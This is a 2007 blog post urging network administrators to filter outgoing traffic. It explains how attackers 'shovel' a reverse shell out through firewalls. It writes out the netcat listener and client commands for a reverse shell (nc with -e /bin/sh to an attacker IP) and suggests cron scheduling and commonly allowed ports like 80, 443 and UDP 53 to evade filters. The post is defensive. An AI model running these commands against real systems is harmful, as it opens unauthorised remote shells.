Thursday, 8 November 2007

Escaping packets can help open the door into your network!

(Or Why Egress filtering is important)

First I had better explain to everyone what Egress filters are. Most people understand the idea of Ingress filtering. This is stopping things coming into the network. Most people will agree that letting anything into the network from the Internet willy-nilly is a bad idea. But what are Egress filters and why are they necessary?

An Egress filter is a block on traffic leaving your network. This may not sound too nefarious, but it is not just the insiders who can damage your network from the inside. An external attacker can “push” a session from the client to a listener. That is they can make a shell connection from your server using outgoing traffic to get an incoming connection to your Internal systems.

Shovelling a shell

You may think that it is not possible to get an incoming shell from the Internet because you block incoming traffic. If you do, you are mistaken. There is an attack method known as shovelling a shell or just a shovelling shell.

Netcat is a common tool for doing this attack. The attacker would setup netcat as follows:
Listener: nc –l –p [port no.]
Client: nc [listenerIP] [port] –e /bin/sh

The firewall will see this as an outgoing connection from your system. It is in reality an incoming interactive shell. It is also a common way of using that buffer overflow condition - take your pick of the latest one hitting the streets.

Generally the client is activated at regular intervals through cron. The attacker will activate a netcat server and wait for the connection from the system being attacked. The system being attacked is generally configured using a common port that is generally allowed through your firewall and expected. Ports such as TCP 25 (SMTP), TCP 80 (HTTP) or TCP 443 (HTTPS) are used. If the attacker is really smart, they will tie the connection to UDP and bind it to something like UDP 53 (DNS) as it is rarely blocked. (nc -u: UDP Mode).

The result – the attacker has a command shell to your system through your firewall. This even works on firewalls that block ALL incoming traffic.

Packet filters are easily fooled, a good proxy level firewall is not – but there are fewer and fewer of these being used.

The worst thing, tools such as metasploit (http://www.metasploit.com/) make this even easier. They bundle the exploit and tools into a single payload that even a novice script kiddie can use. So filter that outgoing Internet Traffic before it is too late!

No comments: